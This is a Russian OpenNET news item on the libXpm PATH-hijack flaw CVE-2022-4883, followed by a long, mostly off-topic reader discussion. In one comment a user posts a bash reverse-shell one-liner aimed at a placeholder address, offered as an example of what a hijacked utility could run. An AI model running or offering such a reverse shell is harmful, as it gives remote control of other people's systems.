The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Уязвимость в libXpm, приводящая к выполнению кода

21.01.2023 10:41

Опубликован корректирующий выпуск библиотеки libXpm 3.5.15, развиваемой проектом X.Org и применяемой для обработки файлов в формате XPM. В новой версии устранены три уязвимости, две из которых (CVE-2022-46285, CVE-2022-44617) приводят к зацикливанию при обработке специально оформленных файлов XPM. Третья уязвимость (CVE-2022-4883) позволяет запустить произвольные команды при выполнении приложений, использующих libXpm. При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии.

Уязвимость вызвана особенностью работы libXpm со сжатыми файлами XPM - при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки (uncompress или gunzip), путь к которым вычисляется на основе переменной окружения PATH. Атака сводится к размещению в доступном пользователю каталоге, присутствующем в списке PATH, собственных исполняемых файлов uncompress или gunzip, которые будут выполнены в случае запуска приложения, использующего libXpm.

Уязвимость устранена заменой вызова execlp на execl с использованием абсолютных путей к утилитам. Дополнительно добавлена сборочная опция "--disable-open-zfile" позволяющая отключить обработку сжатых файлов и вызов внешних утилит для распаковки.

  1. Главная ссылка к новости (https://www.mail-archive.com/x...)
  2. OpenNews: Возможность выполнения кода злоумышленника при открытии XPM файлов в библиотеке imlib2
  3. OpenNews: Уязвимости в X.Org Server и libX11
  4. OpenNews: Обновление X.Org Server 21.1.5 и xwayland 22.1.6 с устранением 6 уязвимостей
  5. OpenNews: Уязвимости в X.Org Server
  6. OpenNews: Обновление X.Org Server 21.1.4 с устранением уязвимостей
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/58524-libxpm
Ключевые слова: libxpm
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (111) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 11:12, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    > При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии.

    Это кто такой умный ставит левым прогам суид-рут?!

     
     
  • 2.4, Аноним (4), 12:07, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.
     
     
  • 3.18, Аноним (1), 14:12, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    И много у тебя троянов внутри суидных прог?
     
  • 3.80, Аноним (-), 00:33, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.

    Вот в какой suid'ной программе она могла бы потребоваться? Даже если забыть о том что в линухе suid уже довольно давно считается "фи" и почти не используется.


     
     
  • 4.103, Аноним (103), 16:06, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ну "почти" не почти, беру первый попавшийся сервер со свежайшим RHEL 9 и все еще вижу сьюды в рута в программах, которые используются постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab, su, passwd/gpasswd, fusermount. Впрочем, полагаю что CAP_SETUID, позволяющий сменить uid на рута, это настолько сильная операция, что тут безопасности от отказа от сьюд почти и не будет (хотя какие-то эксплоиты, наверное, предотвратить можно).
     
     
  • 5.113, Аноним (-), 04:19, 24/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > и все еще вижу сьюды в рута в программах, которые используются
    > постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab,
    > su, passwd/gpasswd, fusermount.

    И которой из них сабжа надо?

     
  • 2.49, dannyD (?), 18:19, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >>Это кто такой умный ставит левым прогам суид-рут?!

    а спроси.

    ни кто не заметил, что даже если дать
    ~/.local/share/TelegramDesktop/log.txt root ro, то всё равно он переписывается ?

    т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

    вот меня это как-то напрягает.

     
     
  • 3.55, Аноним (1), 19:57, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Потому что ты ничего не понимаешь. Права на каталог TelegramDesktop - чьи? Вот чьи права - тот и может удалять-добавлять файлы в этом каталоге. Что такое "переписать"? Старый файл - удаляется, новый - создаётся, обе операции зависят от прав на _каталог_.

    Тебе нужен "закрепляющий бит": каталог с установленным sticky-битом означает, что удалить файл из этого каталога может только владелец файла или root. Не забывай, если выше ещё есть каталоги.

     
     
  • 4.56, dannyD (?), 20:23, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    спс

    зы. я не админ, я оффтоп не люблю.
    ззы. совсем не люблю.

     
  • 4.79, dannyD (?), 00:31, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >>Потому что ты ничего не понимаешь.....
    >>...нужен "закрепляющий бит": каталог с установленным sticky-битом означает,

    а можно чиста каннеретна \../_ _\../

    что сделать, чтоб в файле нулевой длины ~/.local/share/TelegramDesktop/log.txt

    запускаемая программа (телеграм) ничего не могла записать или измемить?
    т.е. задача блокировать ведение этого лога.

     
     
  • 5.100, Perlovka (ok), 13:40, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Гугли setattr
     
  • 5.115, Аноним (1), 05:28, 24/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > чтоб в файле нулевой длины ... запускаемая программа (телеграм) ничего не могла

    частенько встречается такая задача, погасить неуёмное приложение. Инструменты все озвучены выше: закрепление и рут-владелец (и на группу тоже).

     
  • 5.119, Аноним (119), 04:59, 25/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    sudo chattr +ai /path/to/file

     
  • 3.64, Аноним (-), 22:37, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

    А owner у него кто?

    > вот меня это как-то напрягает.

    Chattr +i ему поставь. Или если не хочется чтобы там что-то было, можно убрать файло, создать диру с этим именем, и если программа в принципе может после этого работать - ну, ой, в диру дописать что либо она уже не сможет. Получит "Is a directory" как отлуп.

     
     
  • 4.101, dannyD (?), 14:08, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    спс, разорбрался.

    конкретно телеграмм отказывается запускаться с отбитым логом.

     
     
  • 5.107, ivan_erohin (?), 17:15, 23/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    очень, очень наглый кусок дуровкода.
    а если залинковать это в /dev/null:
    $ rm -f -- ~/.local/share/TelegramDesktop/log.txt
    $ ln -s ~/.local/share/TelegramDesktop/log.txt /dev/null
    (и/или то же самое после запуска дуровграма)
    что будет ?

    ps: man socat вдруг появятся еще идеи.

     
     
  • 6.110, dannyD (?), 22:12, 23/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    разумеется сслыка будет прибита, а на ёё месте будет новый файл.

    PS. это первое, что было испробовано.

     
  • 6.111, dannyD (?), 22:19, 23/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    тоже самое с ~/.xsession-errors от lightdm

    лечится ковырянием сырца с переносом в /tmp который на tmpfs

     
  • 5.114, Аноним (-), 04:23, 24/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > конкретно телеграмм отказывается запускаться с отбитым логом.

    Ггг лол, ну, я бы если пользовался этим крапом вгрузил бы LD_PRELOAD'ом libfxxxoff.so - который так то open() с вон тем аргументом как-бы сделает. Теоретически. Практически, делать что-то с файлами в фс при этом совершенно не обязательно, только имитировать что все прокатило. Можно подумать, оно еще и проверять содержимое будет. Главное грамотно с314ть что все збс :)

     
     
  • 6.116, dannyD (?), 07:48, 24/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    нихтфирштейн.
     

  • 1.2, Аноним (1), 11:13, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +6 +/
    > Атака сводится к размещению в доступном пользователю каталоге, присутствующем в списке PATH, собственных исполняемых файлов

    Ну а это вообще жесть :)

     
     
  • 2.3, Аноним (3), 12:01, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    По сути, не отличается от подмены утилиты или библиотеки на левую. Вы обречены.
     
     
  • 3.19, Аноним (1), 14:14, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > не отличается от подмены утилиты или библиотеки на левую

    Вот с этого и надо было статью начинать: "сначала надо подменить систему".

     
  • 2.11, An onymous (?), 12:43, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +5 +/
    warning! Пользователь может запустить под собой какую-то программу!
     
     
  • 3.40, Аноним (40), 16:34, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Warning. Программа с suid бит может запустить под root какую-то программу вместо gzip
     
     
  • 4.47, Admino (ok), 18:00, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А что за программа-то?
     
     
  • 5.51, OpenEcho (?), 18:36, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > А что за программа-то?

        bash -i >& /dev/udp/1.2.3.4/1337 0>&1

     
     
  • 6.54, Admino (ok), 19:38, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    С правами рута и с использованием libXpm?

    Отсыпь.

     
     
  • 7.108, OpenEcho (?), 19:35, 23/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Отсыпь.

    Но, тебе уже и так хватит :)

    Но если хочешь чтоб быстрей отпустило, дай доступ на ограниченый экаунт в которм суидишная компроментированная/вулнерабная прожка есть

     
     
  • 8.109, Admino (ok), 19:45, 23/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Так вот мне и интересно было, где это в дистрибутивах встречается графическая ту... текст свёрнут, показать
     
     
  • 9.117, OpenEcho (?), 00:03, 25/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А-а-а, вы о этом, сори, не понял к сожалению помимо безобидного текстового XP... большой текст свёрнут, показать
     
     
  • 10.118, Admino (ok), 00:08, 25/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем ты привёл кучу текстовых утилит, которые к libXpm никаким боком отношения ... текст свёрнут, показать
     
     
  • 11.121, OpenEcho (?), 19:55, 25/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Это usr bin passwd текстовая утилита А мы разве не отошли он libXPM и говорим... текст свёрнут, показать
     
     
  • 12.122, Admino (ok), 20:01, 25/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Это троллинг тупостью Да, usr bin passwd - это текстовая утилита Для эксплуат... текст свёрнут, показать
     
     
  • 13.123, OpenEcho (?), 00:28, 26/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    О-о-о, понятно, еще один умный пуп, ну-ну смакуй дальше сам какой ты умный ... текст свёрнут, показать
     

  • 1.5, Аноним (5), 12:11, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • –7 +/
    Ядро - одна большая чёрная дырка. Остальные проги тоже, даже sudo который со времён мамонтов, дырявый до сих пор. ОпенБСД занесли за бэкдоры и дырки, тоже не секрет и очень давно уже.

    Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь что wine хоть работает, и то слава богу, ну хоть одна хорошая новость. Как жить то теперь?

     
     
  • 2.6, Аноним (6), 12:22, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Без таких нытиков как ты - нормально жить
     
  • 2.9, деанон (?), 12:39, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Зуммер узнал, что мир не идеален
     
     
  • 3.12, Аноним (5), 12:50, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Да откудаж вы рождаетесь то инородные такие, что аж каждый вдох и выдох это уже полноценный вывод.
    Кто-то прав, вас уже многова-то..
     
  • 2.10, Аноним (10), 12:41, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Хорошо жить на Винде 11
     
     
  • 3.13, Анатолий Цыбин (ok), 12:52, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Естественно, ведь на Винде нет дыр. Весь мир знает, что Майкрософт -- это фирма от самого бога, в которой работают трудолюбивейшие как Стаханов и умнейшие как Эйнштейн специалисты. Они любят пользователя и заботятся о нём, поэтому не допущают никаких дыр, никаких уязвимостей в принципе.
    Те, кто попадают в рай, являются свидетелями того, что у самого бога стоит Винда.
    А кто попадает в ад... Ну, не будем о плохом. =)
     
     
  • 4.35, Аноним (35), 15:14, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Ну не просто же так в линуксе демоны
     
     
  • 5.46, Admino (ok), 17:59, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +4 +/
    И зомби.

    И в винде иконки и службы.

     
  • 2.15, Аноним (15), 13:12, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А в стенах камеры ещё.
     
  • 2.65, Аноним (-), 22:39, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Ядро - одна большая чёрная дырка.

    Ога, блин, выполняет запросы программ, такое сякое. Если запросы программ не выполнять - знаете как хакеры обломаются?! Кстати это работает. Скажем, у меня есть библа которая заворачивает попытки файлы открывать. Программы очень прикольно обижаются когда им почти ничего открыть не дают. Правда далеко не все их них потом работать согласны.

     
  • 2.82, Аноним (-), 00:39, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь
    > что wine хоть работает, и то слава богу,

    Так что можно позапускать и виндовые трояны милые сердцу прожженого маздайца? Тут уж кому что.

     

  • 1.14, Ананоним (?), 13:08, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ну они скоро подарят всяким докерам фичу невозможности пользователю менять переменную PATH. Скажите переменным окружения прощай! Депрекатед!
     
     
  • 2.20, Аноним (1), 14:17, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Да пусть меняет PATH, сколько влезет. Вопрос в другом: какого фига разрешено недоверенному юзеру запускать что-то оттуда, куда он имеет права на запись? Админ локалхоста забыл про noexec?
     
     
  • 3.33, Омномним (?), 15:07, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да не, ну это херня, у меня другой вопрос: каким образом этот юзер себе suid root-то организует?
    А так - ну запускает непривилигерованный юзер что-то, в чём проблема-то? :)
     
     
  • 4.41, GOrilla (?), 16:42, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Как это в чем? А эксплоит запускает тогда что. Шелл хостинги не дают запускать из хоумов.
     

  • 1.16, InuYasha (??), 13:25, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > при помощи вызова execlp() запускает внешние утилиты

    Ну это вообще... смузикод из 80ых что-ли? system("gzip my shit"); А всё потому что нет нормального LinAPI?

    Если кто будет возмущаться, я тоже делал exec для всяких костылей, и знаю, что иногда надо, но это грязный хак, и не в проде же )

     
     
  • 2.21, Аноним (21), 14:19, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > А всё потому что нет нормального LinAPI?

    А как ты себе это представляешь в принципе? Абсолютно все утилиты на компе должны идти с lib<util_name>.so и каждая утилита должна линковаться с каждой библиотекой другой утилиты?

     
     
  • 3.27, Аноним (40), 14:52, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    В Винде можно dll связать с другой dll.
    В java можно динамически загружать нативные библиотеки.
    Почему в libxpm нельзя как то так?

    Или просто скопипастить код распаковки в исходный код lixpm и не запускать неизвестно какие исполняемые файлы

     
     
  • 4.53, Аноним (21), 19:14, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > В java можно динамически загружать нативные библиотеки.

    Офигеть, вот это круто! Это dlopen() что-ли?

     
     
  • 5.95, Аноним (10), 10:40, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    System.loadLibrary
     
  • 4.57, Sw00p aka Jerom (?), 20:38, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ну вон в винде дллки также инжектят разница-то в чем?
     
  • 4.63, Аноним (63), 22:34, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Потому что unix это не винда
     
  • 4.71, Аноним (-), 22:47, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > В Винде можно dll связать с другой dll.

    В Linux тоже так можно. И чего?

    > В java можно динамически загружать нативные библиотеки.

    Да охренеть! В нативных программах, только подумайте, тоже.

    > Почему в libxpm нельзя как то так?

    При желании можно. Просто видимо авторы были ленивые и это показалось им сложнее чем вон то. А чо, в винде тоже можно CreateProcess* сделать из либы если захотеть.

    > Или просто скопипастить код распаковки в исходный код lixpm и не запускать
    > неизвестно какие исполняемые файлы

    Справедливости ради - найти программу которую еще и огреть вон тем удастся придется постараться.

     
  • 3.29, InuYasha (??), 14:55, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    В идеальном мире - примерно да. Функции, алгоритмы, код - в ДЛЛках, CLI и фронтенд - на чём хочешь. А если вспомнить rundll32, то, с натяжкой, КЛИ у нас уже готов... )
    Конкретно по сабжу - я реально удивлён что там не подключили какую-нибудь библиотеку.
     
  • 3.45, Аноним (45), 17:13, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    В данном случае распаковка не является задачей libXpm. Программа может напрямую вызвать zlib, и разжатые данные передать libXpm
     
  • 3.70, Аноним (70), 22:45, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    В полноценных операционных системах еще с 90х годов у каждой программы нужные библиотеки лежат в каталоге с этой самой программой и только общесистемные лежат в каталоге операционной системы, где-нибудь в C:\OS2\DLL или C:\Windows\System32.
     

  • 1.17, InuYasha (??), 13:30, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Гос.пади, xpm - это битмапы в формате сишного массива что-ли? JSON и смузихлёбство из прошлого века? Всю жизнь его ненавидел. Зато проприетарасты его обожают.
     
     
  • 2.22, Аноним (21), 14:20, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    И я его обожаю. В CDE божественные xpm'ные иконки
     
     
  • 3.92, Аноним (92), 09:47, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А если бы они были png'шные, было бы не то?
     
     
  • 4.99, Аноним (21), 13:32, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    ощущения не те
     
  • 2.23, Аноним (1), 14:24, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Дело не в xpm, а что тебе кто-то может ls, например, подменить, а ты потом sudo ls сделаешь (это так, для наглядности, про что "уязвимость").
     
     
  • 3.26, InuYasha (??), 14:51, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да это-то понятно. Просто вспомнил, что xpm такое. Пока у тебя диск завален xpm-ками - это всё смешно, а, вот, когда у тебя бинарники со вSHITыми в виде данных (а не, хотя бы, ресурсов) картинками - вообще грусть. Особенно если это прошивки какие-нибудь.
     

  • 1.24, Аноним (40), 14:42, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    >Уязвимость вызвана особенностью работы libXpm со сжатыми файлами XPM - при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки (uncompress или gunzip)

    Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

     
     
  • 2.32, Аноним (40), 15:07, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Хотя я тоже писала код запускающий внешний исполняемый файл для ковертации, который в прод работает.
    Но там ни путь ни параметры от пользователя не приходят.
     
  • 2.48, Аноним (21), 18:05, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

    А что не так? У вас там в расте особенности работы с памятью, а у нас особенность работы с libXpm

     
  • 2.66, Аноним (63), 22:40, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Очень хорошая архитектура

    Верно, классическая UNIX, позволяет менять алгоритм сжатия без изменения кода приложения и перекомпиляции.

     
     
  • 3.94, Аноним (10), 10:36, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Менять алгоритм сжатия на запуск произвольного кода?
     
  • 2.106, kusb (?), 14:43, 23/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Может быть истинно понятная и безопасная ОС и должна так работать, без всяких шуток.
     

  • 1.25, Аноним (25), 14:44, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    >запускает внешние утилиты распаковки (uncompress или gunzip)

    Вон из профессии за такое решение.

    >Уязвимость устранена заменой вызова execlp на execl с использованием абсолютных путей к утилитам

    Вон из профессии за такой фикс.

     
     
  • 2.36, Аноним (36), 15:28, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А если бы они использовали другой язык проблем было бы ещё больше. В том числе с программистами и их решениями.
     
     
  • 3.39, Аноним (39), 16:27, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Какой нахрен другой язык, им дали zlib - нет "хочу дёргать exec". Необучаемые.
     
     
  • 4.75, Аноним (75), 23:34, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Положить zlib.so в PATH. Повторить эксперимент
     
     
  • 5.77, Аноним (21), 23:36, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ldconfig использует $PATH?
     
  • 2.68, Аноним (63), 22:41, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Давай tar ещё выгони, дурик.
     
     
  • 3.96, Аноним (96), 10:47, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    tar давно ффтопку, ибо его разрабы не понимают в архитектуре и делали его абы-как и в результате он выглядит как неудобное в использовании нагромождение говна. Рано или поздно всё это говно придётся разгребать и делать по-человечески. Только почему опять мне?
     

  • 1.30, Омномним (?), 15:03, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки

    А libz поюзать вообще не судьба была?

     
     
  • 2.34, Аноним (34), 15:11, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ну, тогда бы сейчас бы читали новость об очередном переполнении int и выходы за пределы буфера.
     
     
  • 3.37, Аноним (36), 15:29, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Выходить? Не надо так.
     
  • 3.112, Омномним (?), 00:11, 24/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Пока что только новость о выходе за пределы сознания.
     

  • 1.38, Анонн (?), 16:15, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Офигенный код и офигенный фикс...
    Кто там пыхеров и жсников за eval ругал? Ваш выход!
     
     
  • 2.44, Аноним (44), 17:12, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    В это проблема GNU/Xorg библиотек. Десятки тысяч исходных кодов, которые не верифицировались и не обновлялись на протяжении, например 11 лет! 20 лет! да там есть и такое.
     
     
  • 3.97, Аноним (96), 10:48, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    У вейланда другая проблема - падает и глючит.
     
  • 3.105, Аноним (105), 13:08, 23/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >GNU/Xorg

    Конечно, FSF был бы не против этого.

     

  • 1.43, Аноним (44), 17:09, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А ведь можно было использовать библиотеки реализующие декомпрессию z/gz и не вызывать в коде библиотеки (библиотеки!!) внешние исполняемые файлы.
     
     
  • 2.60, Аноним (3), 21:10, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Юникс вэй. Утилита > утилита > утилита.
     
     
  • 3.72, Аноним (70), 22:47, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Утилита > утилита > утилита > You're pwned
     

  • 1.61, Аноним (-), 22:11, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Блеск и нищета опенсорса.

    Врачи пишут планировщики задач, студни и всякие бoмжы пишут свои утилитки "лишь бы работало", потом приходят другие и лепят на основе этих поделок что-то свое, потом это слепливают в большой дурнопахнущий ком и выкладывают в прод.

    А потом оказывается что пол инета зависит от стремной либы, автор которой давно на нее забил, которая никогда не ревьювилась и не обновлялась уже годы...

    Колосс на глиняных ногах!

     
     
  • 2.62, Аноним (62), 22:17, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Зато в ынтерпрайзе всё не так. Сеньёры молятся на новые версии библиотек и дают по рукам джунам, которые делают свои! :D
     
     
  • 3.67, Аноним (-), 22:40, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • –2 +/
    В ынтерплайзе никто не будет писать либу просто так. По крайней мере в рабочее время.

    Еще забыл про основной аргумент за опенсорс - бесплатность.

    Спросишь 'Чем этот фоторедактор лучше чем стандарт индустрии?'
    - 'Он же бесплатный!' ответят тебе.
    - 'Но он же кривой, косой и багованый!'
    - 'Зато бесплатный!'
    Ох, это сладкое слово халява!

    Те кто будут писать что проприетарный софт тоже ничего не должен - вы явно не доросли до SLA)))

     
     
  • 4.69, Аноним (63), 22:42, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Свободный и бесплатный это разные вещи.
     
     
  • 5.73, Аноним (-), 22:59, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А я и не утверждал, что это одинаковые вещи.
    Просто настоящих идейных крайне мало, но они хоть вызывают уважение.

    Но большинство пользователей опенсорца интересует только аспект бесплатности.
    Они просто качают ибо халява, крайне редко куда-то донатят и еще реже делают вклад написание кода/ревью/тестированием/дизайном. Подавляющему большинству даже лень багрепорты отправлять.

    И единственный их вклад в развитие опенсорс - рассказать другу 'о, я тут беспланую аппу скачал!'

     
  • 5.74, Аноним (-), 23:09, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Это же все видно.
    Посмотрите сколько пользователей у того же firefox, и сколько у них было донатов от 'физлиц' И заодно кол-во контрибьюторов в их репы.
    Или у LibreOffice? Или GIMP?
    Каждый сотый? Каждый тысячный? Или все еще хуже?

    Людям как-то объяснили про бесплатность опенсорса, а про то что за свободу нужно платить - нет.

    В итоге развивается только во что вложились корпорации. А пользователи ноют 'праклятые карпарасты испортили мой опенсорс'
    Да он никогда их и не был!

     
     
  • 6.86, Бывалый смузихлёб (?), 05:26, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > за свободу нужно платить - нет

    Свобода, за которую надо платить - это платная временная вольная от хозяина

    По корпорациям и прочему - почему-то тот же опенсорс и его адептов вовсе не смущает, что абсолютное большинство на его благо трудится за доброе слово даже без прав на собственный код( а то и за пинок под жО за несоблюдение кок’ов )

    Что вовсе не мешает руководству тех структур за счёт добровольных пожертвований платить самим себе зарплату и почти непрерывно кататься по всему миру и закатывать балы-пиры разумеется в рамках популяризации попенсорса вместо денежной поддержки участников.
    Даже не зарплатных а хотя бы уровня выплаты за годную фичу. Даже полтишок - мелочь, а приятно.

    В общем, уверен ли анон-знаток-всего-на-свете, что донаты идут именно на работу над продуктом и что за всю работу над проектом сама контора платит конечным разработчикам ?
    Ну, чтобы иметь хоть какое-то минимальное право требовать денег за фичи

     
     
  • 7.90, Аноним (-), 09:16, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А потому что это не правда The number of unpaid developers may be stabilizing... большой текст свёрнут, показать
     
  • 7.91, Аноним (-), 09:28, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А потому что они копируют корпоративную структуру от которой и получают деньги ... большой текст свёрнут, показать
     
  • 6.93, Аноним (92), 09:50, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Раньше на сайте Криты писалась сумма пожертвований. Потом вроде убрали, чтобы не позориться.
     
  • 4.76, Аноним (3), 23:35, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > никто не будет писать либу просто так

    дык за деньги же

    в отечественном ынтерпрайзе токо и делают, что используют бесплатные либы. а кто считает, что это не так, тот явно не дорос

     
  • 4.78, Аноним (78), 23:46, 21/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >В ынтерплайзе никто не будет писать либу просто так

    АХАХАХАХА

     
  • 4.83, Аноним (-), 00:41, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Те кто будут писать что проприетарный софт тоже ничего не должен -
    > вы явно не доросли до SLA)))

    Однако в лицензиях проприетарного софта почему-то написано про AS IS. Да, некоторые еще и читают это.

     
  • 4.84, Аноним (1), 00:50, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > В ынтерплайзе никто не будет писать либу просто так

    То-то у "ынтерплайза" сейчас версионная диарея.

     
  • 4.87, Бывалый смузихлёб (?), 05:31, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > В ынтерплайзе никто не будет писать либу просто так.
    > По крайней мере в рабочее время.

    Ну почему же, вполне будет.
    Только если это не согласовано с конторой, либо будут разборки о том кому код принадлежит, либо - сколько штрафа должен заплатить сотрудник за неисполнение обязанностей( т.е что на работе занимался не работой а черти чем, но зарплату ему платили будто бы он работал )

     
  • 4.102, хрю (?), 14:23, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >>В ынтерплайзе никто не будет писать либу просто так.

    :D :D :D :D :D Не реально смешно. Чел никогда не видел ынтерплайза? Зачастую, он чуть меньше чем полностью состоит из 7 колёсных велосипедов.

     
  • 2.85, Аноним (34), 01:42, 22/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
